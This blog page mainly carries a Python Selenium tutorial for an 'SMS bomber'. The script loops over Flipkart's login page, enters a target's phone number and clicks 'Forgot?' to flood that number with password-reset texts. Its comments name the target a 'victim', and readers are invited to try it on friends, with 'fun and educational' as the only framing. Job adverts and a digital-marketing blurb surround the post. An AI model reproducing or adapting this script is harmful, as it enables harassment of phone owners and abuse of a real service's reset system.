Skip to main content

Arcadis is Hiring!!!

 ARCADIS IS HIRING!!! Company : Arcadia Position : Software Engineer Experience : Bs/Ms Degree : BS in CS Apply Link: Apply Here

How we can do Fun with Python!!

 SMS Automation Using Python:

So Now we Need  to have Any Python Compiler like Pycharm, Annaconnda, Atom, Jupyter, sypder or and specially I like the most VS code.

 After that we need to install the required Libraries to perform such task
1. selenium 
2. Time
3. Install the extension of chrome, type in web browser Chromedriver.

Here, we are going to learn a simple SMS bomber trick (for fun and educational purpose). Selenium is a free tool for automated testing across different browsers. In this tutorial, we will learn to send automatically number of spam SMS for given number of frequency and interval.




Let's have a code of that:

from selenium import webdriver

import time


# create instance of Chrome webdriver

browser = webdriver.Chrome()


# set the frequency of sms

frequency = 10


# target mobile number, change it to victim's number and

# also ensure that it's registered on flipkart

mobile_number ="1234567890"


for i in range(frequency):

browser.get('https://www.flipkart.com/account/login?ret =/')


# find the element where we have to

# enter the number using the class name

number = browser.find_element_by_class_name('_2zrpKA')


# automatically type the target number

number.send_keys("1234567890")

# find the element to send a forgot password

# request using it's class name

forgot = browser.find_element_by_link_text('Forgot?')

# clicking on that element

forgot.click()

# set the interval to send each sms

time.sleep(10)

# Close the browser

browser.quit()

Output:

Try And check on ur friends and tell us their Reaction on Instagram @madin_tech

Comments

Popular posts from this blog

Let's Start with the Internet Marketing | Affiliate Marketing

Digital Marketing is  that the act of promoting and mercantilism merchandise and services by leverage online selling ways like social media selling, search selling, and email marketing. At a high level, digital marketing refers to advertising delivered through digital channels like search engines, websites, social media, email, and mobile apps. Using these online media channels, digital marketing is that the method by which companies endorse goods, services, and brands. Consumers heavily depend upon digital means to research products. as an example, Think with Google marketing insights found that 48% of consumers start their inquiries on search engines, while 33% look to brand websites and 26% search within mobile applications. While modern-day digital marketing is an unlimited system of channels to which marketers simply must onboard their brands, advertising online is way more complex than the channels alone....

Hewlett Packard Enterprise

CMS INTERN JOB   At Hewlett Packard Enterprise, we bring together the brightest minds to create breakthrough technology solutions that advance the way people live and work. What sets us apart? Our people and our relentless dedication to helping our customers make their mark on the world. We are a team of doers, dreamers and visionaries; inspired by our purpose and driven by our strategy. We live by our three values: partner, innovate and act. Our legacy inspires us as we forge ahead, always pushing to discover what’s next. Every day is a new opportunity to advance and grow ourselves, our company and the industry. Some people call it an obsession, we call it a way of life. SOME INFORMATIONS AND BASIC REQUIREMENTS REGARDING THE JOB: Job ID: 1104914 Date Posted: 10/26/2021 Primary Location: Bangalore, Karnataka Other Locations: Bangalore, Karnataka, India,Chennai,TAMILNADU, India Job Category: Graduate Program and Internships Schedule: Full time Shift: No shift premium (India) Respons...